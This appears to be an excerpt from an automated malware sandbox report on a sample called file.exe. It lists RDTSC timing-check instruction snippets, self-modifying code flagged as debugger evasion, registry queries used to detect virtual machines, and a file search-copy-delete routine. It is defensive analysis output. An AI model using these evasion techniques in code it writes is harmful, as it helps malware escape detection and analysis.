Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E9D second address: ED3EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F113721Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4006 second address: ED400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED400C second address: ED4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4169 second address: ED4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4173 second address: ED4184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F60F1137216h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48E9 second address: ED48EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48EF second address: ED48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48F3 second address: ED48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48F7 second address: ED48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48FD second address: ED4919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F60F12493B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4919 second address: ED493A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED493A second address: ED4971 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F12493A6h 0x00000008 je 00007F60F12493A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F60F12493AFh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60F12493B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED90E7 second address: ED9103 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F1137224h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9103 second address: ED9112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F60F12493A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9112 second address: ED9116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9116 second address: ED913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F12493AAh 0x00000013 jmp 00007F60F12493AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED913C second address: ED9142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC182 second address: EDC1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F60F12493B7h 0x00000014 jl 00007F60F12493A6h 0x0000001a push eax 0x0000001b pop eax 0x0000001c ja 00007F60F12493A6h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC1C2 second address: EDC1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F1137228h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE92DA second address: EE92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE8E23 second address: EE8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC964 second address: EEC970 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC970 second address: EEC986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA00 second address: EFEA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F60F12493A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA12 second address: EFEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA16 second address: EFEA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F03E5E second address: F03E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040BF second address: F040E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F12493B0h 0x0000000a pushad 0x0000000b jnp 00007F60F12493A6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040E4 second address: F040EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040EA second address: F040EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04240 second address: F04244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F044D4 second address: F04512 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60F12493A6h 0x00000008 jmp 00007F60F12493B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60F12493B1h 0x00000016 push edi 0x00000017 js 00007F60F12493A6h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04F97 second address: F04FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F1137216h 0x00000008 jmp 00007F60F113721Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FB0 second address: F04FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A731 second address: F0A747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A47F second address: F0A48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A48A second address: F0A492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F150E4 second address: F150EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F14F09 second address: F14F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD16 second address: F1DD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD1A second address: F1DD38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F1137228h 0x0000000c jmp 00007F60F1137222h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD38 second address: F1DD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD3E second address: F1DD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD48 second address: F1DD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD4C second address: F1DD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jns 00007F60F113721Ch 0x00000011 pushad 0x00000012 jmp 00007F60F1137221h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB6F second address: F1DB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60F12493B3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB8B second address: F1DB9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F60F113721Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB9B second address: F1DBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DBA2 second address: F1DBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2B8ED second address: F2B90E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60F12493B9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2B90E second address: F2B922 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F113721Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A67F second address: F3A685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A685 second address: F3A68F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F1137216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A68F second address: F3A6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F60F12493B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6B1 second address: F3A6B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6B7 second address: F3A6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6D4 second address: F3A6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A807 second address: F3A80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3AACE second address: F3AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B0E8 second address: F3B0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B0EE second address: F3B104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B104 second address: F3B115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B115 second address: F3B12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F60F1137222h 0x0000000f jnl 00007F60F1137216h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B12C second address: F3B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B134 second address: F3B13F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E460 second address: F3E46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E46C second address: F3E471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E471 second address: F3E47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E47D second address: F3E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40DA9 second address: F40DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40DAE second address: F40DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40E4B second address: F40E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40E51 second address: F40E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F410D3 second address: F410D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F410D7 second address: F41120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F60F1137218h 0x0000000c popad 0x0000000d nop 0x0000000e mov dx, E42Eh 0x00000012 jmp 00007F60F1137227h 0x00000017 push 00000004h 0x00000019 movsx edx, dx 0x0000001c mov edx, dword ptr [ebp+122D290Ch] 0x00000022 push 143D95A1h 0x00000027 js 00007F60F1137224h 0x0000002d push eax 0x0000002e push edx 0x0000002f js 00007F60F1137216h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CCF second address: F42CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CD3 second address: F42CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F60F1137216h 0x0000000d jnl 00007F60F1137216h 0x00000013 jmp 00007F60F113721Fh 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CFC second address: F42D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42810 second address: F42826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F113721Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44956 second address: F4495C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D026E second address: 54D0288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0288 second address: 54D028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D028E second address: 54D029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D029C second address: 54D02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02A4 second address: 54D02AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02AA second address: 54D02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02AE second address: 54D02B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0369 second address: 54D036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D036F second address: 54D0375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0375 second address: 54D03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, 95h 0x0000000c push edi 0x0000000d mov dl, al 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F60F12493ABh 0x00000018 pushfd 0x00000019 jmp 00007F60F12493B8h 0x0000001e and eax, 2C2F01B8h 0x00000024 jmp 00007F60F12493ABh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov eax, edx 0x00000031 call 00007F60F12493B7h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D03DE second address: 54D0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0400 second address: 54D041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D041D second address: 54D044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137228h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D044F second address: 54D045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E618F4 second address: E618FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E618FE second address: E61902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E5687E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E67C0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CB1AED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: EDEBAA instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00A638B0
